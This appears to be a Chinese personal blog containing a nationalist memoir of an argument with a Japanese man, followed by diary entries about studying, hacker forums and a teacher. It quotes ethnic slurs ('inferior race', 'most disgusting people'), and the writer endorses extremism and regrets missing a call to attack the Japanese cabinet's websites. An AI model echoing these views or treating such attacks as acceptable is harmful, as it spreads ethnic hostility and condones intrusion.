  "我在美国做过hotel的manager,当时有两个人被辞掉了,一个是日本人,一个是中国人。他们都归我管,两个人都来求我,说自己能胜任现在的工作,让我帮忙。我并没有因为其中有日本人而偏袒他,我让他们做同样的工作,谁做好了把谁留下。很不幸的,两个人真的都不是很熟练,我当时教了他们怎么做,让他们继续做好,那个日本人很认真地听我每一句话,最后做得很好,而那中国人又懒又不努力,我都不知道他搞了些什么。最后我忍无可忍。我没有把他当人的对他喊:’你给我滚!’"
  "无可否认有素质差的人,但是这并不能代表全部,难道你的意思是每个中国人都这样?我们有很多人很努力的工作,很敬业,难道你就没看到这些?"
  "工作?你们中国人最擅长的就是互相排挤,懂什么叫团队吗?你们连两个地方的人都会互相看不起,不要说一个团队里来自各个地方了。中国人是最恶心的民族,到处都是一个地方的人看不起另一个地方的。"
  其实他说的这些有很多是我一直想说的,但是作为中国人,我只能抱着复杂的心情继续和他理论。
  "你有什么资格说这些?你对中国的地域了解多少?"
  "南方中国人和北方中国人我都研究过,我还做过类似的报告给日本政府。"他看着我说:"日本人比较看得起你们,你们像日本人,是真正的男人,在遇到侵略的时候会团结起来抗争。这也让我们吃了很多苦头;而南中国人比较聪明,他们不会愿意卷入牺牲和努力;所以他们愿意发展经济。但是一旦有战争发生,他们将是最容易制服的亡国奴。"
  "不许你诬蔑我的同胞!"我义正言辞的告诉他。
  "你不要觉得中国人多团结多伟大,韩国人在国家出现困难的时候可以全国人民捐金子给政府,在你们中国,可能吗???"

  我完全怔住了。

  是啊,他说的千真万确啊!可能吗?大家也可以自己想象,如果是你,你会吗?

  "这个可以不谈,每个人有自己的想法。"他回到那张纸上,指着地图说:"我还是给你们介绍我们的大一统吧。这是世界,十五年后,他就是我们日本人的。"
  他在纸上用繁体字写下:"大一统"。
  "我们不用繁体字,对不起先生,请不要再写了,我们看不懂。"我们很生气他的做法。
  "没关系,其实这也是你们文化的一部分。你们连祖先写的字都放弃了。"他轻蔑地笑着说。
  "我们国家是有规划的,全世界都在看我们的动画片,我们的电视剧,用我们的电器,很多人疯狂的崇拜日本,在中国,也不再少数吧?你们接触的都是外面的文化,而中国人又对自己的文化不感兴趣,当有一天你们一觉醒来,发现身边的一切都是别人的时候。你们连后悔都来不及啦!顺理成章的,总有一天,你们的国土也会变成我们的,因为你们中很多人已经认同我们的东西,我们的思想了。"

  多么的悲哀啊?他说的事情的的确确是真的。我们身边多少人对日本的美国的东西着迷,甚至有哈日,哈韩这样的词语出来。在欧洲,巨无霸被人们认为是美国文化的侵略而被抵制,而中国最近的调查有47%的中国孩子觉得麦当老是中国的品牌,这会有什么样的后果啊?我虽然嘴上在回击,但我的心里很不是滋味,那是一种什么感觉?此时此刻的你能体会到吗?

  "劣等的民族是不应该生存的这么自在的,我们是来解救你们的。在日本,我这样的人有很多,全世界都有,我们是有组织的。我爸爸是老兵,我们都信奉天皇。我不只要到美国中国,还要去欧洲,到全世界宣传我们日本的文化和想法。"
  "算了吧,自大狂,你一直在说中国的文化,中国的文化里面有一样你一直没学到。"
  "噢?是什么?愿意请教。"
  "那是尊重,这是你们日本人永远学不到的,你们以为鞠鞠躬就是尊重了?完全不是。一个不尊重别人的人是不会得到别人的尊重的。"
  "我没有必要尊重你们,因为你们劣等。"

  我当时心里面就像是有很大的火气但是发不出来,我既要保持中国人的气度,又要承受听着一个鬼子侮辱我们整个民族,动粗只是野蛮的表现,但是对他,我们还能怎么样呐?

  "你快走开吧!省着我受不了打你!"
  "小伙子不要乱说话,你打我犯法的,但是我打死你都没有事情,我们的一个朋友就这样做过,最后还是平平安安的被送回日本。你已经很生气了,可能听不下去了,打扰了。"
  他说完这些就走了。桌子上留下了"奉天,大一统"几个字,和一张虽然草草但是画得很熟练的世界地图。

  ……就在他走之后,几个朋友都陷入了沉思。他说得真的好多都是真的。为什么会变成这样哪?

  那天晚上到天亮之前的时间里,我们想了很多很多。

  第二天,我在课上请求老师给我20分钟,我把前一天,看到的,听到的,想到的很没有技巧但是却很发自内心的讲给了一起上课的两个专业的同学。(可能有人还记得吧?00应化和00广电)我从上台的一刻起,就决定了:我没权利改变别人,但是我可以告诉别人,有些事情离我们很近,有些事情我们要警惕,有些事情,我们不能做,还有些事情,我们必须做!!!
  第二年,韩国青年在日本领事馆前“切指明志”,我盯着韩国青年事后包手指时痛苦表情的照片,心里发出由衷的敬意。
  同年,中国有一个很不争气的女明星穿着日本的军旗做的袍子拍照被谴责,可能她不知道,甚至很多人还站在她那边觉得是小题大做。我后来怎么看她的嘴脸,怎么觉得越发恶心。同年8月份,日本首相小泉参拜靖国神社,看着日本老兵穿着二战的衣服,心里又想起了那个日本人和我说过得很多话。
  同年冬天,第一次看到王选的事迹。从心底支持这个"英雄",在我眼里,他就是女英雄。日本人曾经对中国做过什么,当时日语系办了一个日本文化周,我当时真的百感交集,他们的宣传材料上全是说日本这么好那么好,举办活动加强什么交流,还要征文,那几天小泉刚刚参拜过靖国神社,日本导弹威胁中国也是那时候刚发生的事情,他们就不知道为这个来征文吗?想起有些学日语的学生给饭卡加钱的时候,写名字都用日文来写,心里更恼火,难道有些人学日语是为了媚日吗?我当着很多人的面把学校所有的宣传材料都撕掉了——你可以麻木,但是你不可以教唆别人!!!
  2002年夏天,我去了沈阳,参观了9·18纪念馆。当我看到日本兵穿过的军装真实地摆在我面前的时候。我的心哭了。我真想把他拿出来烧掉,看着他,想着几十年前,穿这身衣服的人亲手做过些什么??我简直无法忍受!!!!
  出馆的时候,我留了很多留言,足足有两页。但是我觉得,写在多都不够表达我的心情,那是一种真正的痛!等我以后有钱了,一定捐钱给9·18纪念馆,让更多的年轻人能够进去看看,让更多的人知道,有些历史是不能忘记的!!!

  又是一年"九·一八",在这天,在我的家乡。大连、沈阳、哈尔滨、长春所有的汽车都会在二十二点鸣一分钟喇叭,东北境内的所有火车也会鸣笛。听到笛声的时候。那是一种什么样的心情?那更像是一种嗥叫!向过去一切不平的嗥叫!——此时我落泪了!!!——-是一种无名的热泪!!!

   

读感:

    我是很少哭泣的人,但今天我流了很多泪水!我不反对极端主义,一个社会有了这些才算做完整!我不反对禁止购买日货,不仅因为我喜欢日本的高科技!我担心的只是还在成长的我们,将来…………剩下未知!我们的成长不能成为拖累,祖国的未来!我们不一定必须成为极端主义者,但至少我们得将自己的国家强大起来!这是我们的责任!永远!
    今年清明节,朋友在网上招人攻击小泉内阁的网站,我没有去,因为我去祭奠娇气了。现在后悔了!如果娇气还在,她一定支持我这么做!
    永远不要忘记我是一个中国人!今夜我在此发自内心的说!明天我把上面的文章打出来放在身上。如果哪一刻松懈了,我可以看看它!

补课最后的感慨

    7月10日开始补课,我在电脑前一直坐了22天。可能是太过迁就自己的结果,今天我再没了任何写文章的灵感。我好苦闷,实在没事情可做。黑客网站上的帖子随便看看,黑色软件随便下载,把这机子上种了不知道多少木马、间谍软件!我苦闷,在黑客小组碰到个比我大点的斑竹,答应帮我找事情做!可一听我高考都还没参加,就坚决的要我参加了高考再找他!我真要疯了!我为什么要学习计算机?

    斑竹唤醒了我的未知情绪,为了高考,我决定闭关!虽然我的英语很差,我大不了拼了我这活了十几年的性命!我豁出去了。9月将有等级考试和计算机奥林匹克竞赛,我的三级必须通过,因为高三不会在给我过级的时间!奥赛我不想参加了,以我现在的实力,我得给自己留点自知之明。当然,如果站在讲台上的那家伙实在要我参加,我还是会欣然前往的!但我想那不可能了,所以把这无知的梦收起来!

    还有自己的文章,我爱好文学,如果我热爱战争!我所有的激情和狂热都可以奉献在这片我热爱的土地。现在有十多天时间可以让我用来写文章,我决不会放过。机遇难得,好的写作环境更难得。拼尽我所有的热情把握!

    最后说我最不想做的事情。等级考试得背两本书,《三级网络技术》,《计算机公共基础知识》这是两本比背的书籍。我并不是记性差的笨蛋,也不是懒于强记的懒汉!但以我现在的状态,可能既写不好文章,也背不了那两本书!我对农村寄予了太多的希望,希望它不要让我失望!

那让我无法忘记的老师

    时光如云雨飞逝,转眼间我已从愚昧的初中时代跳进今天的高三。我的文学启蒙老师也从起初教授初中音乐提升至今天的高中语文。如果我走过的路是循序渐进,那么老师脚下的每一步都应该是以艰辛和汗水做为铺垫!

    面对老师,我总是背负着深深的愧疚。虽然我一直收藏着老师的电话号码,但一直未敢拿起听筒,也没有踏上过那艰难行程。因为我觉得愧对于她。

    7月30日,CCTV-10《人与社会》播出了张清燕的故事。我惊奇的发现我的文学启蒙老师居然是张清燕的班主任,我不胜荣幸。因为我知道老师一定在其中起了很大的作用,老师的丈夫是政府官员,老师一定不会放过他的!只是今天我见到的老师跟四年前的老师相比,明显的老多了,其实这样也好!少了少女的清纯,添些女人的成熟。又有什么不可?

    这篇文章我不能给它什么下文,因为我对老师的感情不是由此而始,也不会因此而终。我所能做的只是给老师的祝愿和祈福。

     祝愿她事业顺利,不要再碰到像我这般让她流泪的孩子。

     我祈求苍天保佑,保佑她清纯的容颜不要过早退去。